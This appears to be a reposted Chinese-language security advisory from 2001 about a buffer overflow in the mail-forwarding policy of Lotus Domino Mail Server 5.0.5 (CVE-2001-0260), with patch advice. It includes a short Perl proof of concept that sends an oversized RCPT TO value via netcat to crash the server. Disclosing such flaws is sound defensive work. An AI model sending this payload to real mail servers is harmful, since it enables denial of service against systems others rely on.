Lotus Domino邮件服务器策略缓冲区溢出漏洞

2008-04-10 03:05:12来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Lotus Domino邮件服务器策略缓冲区溢出漏洞

发布日期:2001-02-02
更新日期:2001-02-02

受影响系统:

Lotus Domino Mail Server 5.0.5
不受影响系统:

Lotus Domino Mail Server 5.0.6
描述:

BUGTRAQ ID: 2283
CVE(CAN) ID: CVE-2001-0260

Lotus Domino邮件服务器未能正确检查由用户提供输入值的一个字段,该字段是用来
指定邮件转发策略中所允许的域名的。

结果,如果该策略特性被允许的话,将恶意构造的值作为输入赋给该字段就可以使相
关的缓冲区溢出,这将允许攻击者将服务器击溃或者以邮件服务器的权限执行任意代
码。

成功地利用这个漏洞可以使主机被完全侵害。

<* 来源:Security Research Team (security@relaygroup.com) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


将下面的allowed.domain.com改成相应的域名,并利用netcat将下面的程序的输
出发送给邮件服务器,就可能使其崩溃:

#!/usr/bin/perl
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";




建议:

厂商补丁:

升级到Lotus Domino Mail Server 5.0.6
http://www.notes.net/r5fixlist.nsf/6d4eae9850a5c2c28525690400551b57/5eea8322c479de968525697d00737ad5?OpenDocument


标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:ISC Bind 内存信息泄漏漏洞

下一篇:Wu-Ftpd调试模式客户机器名格式串漏洞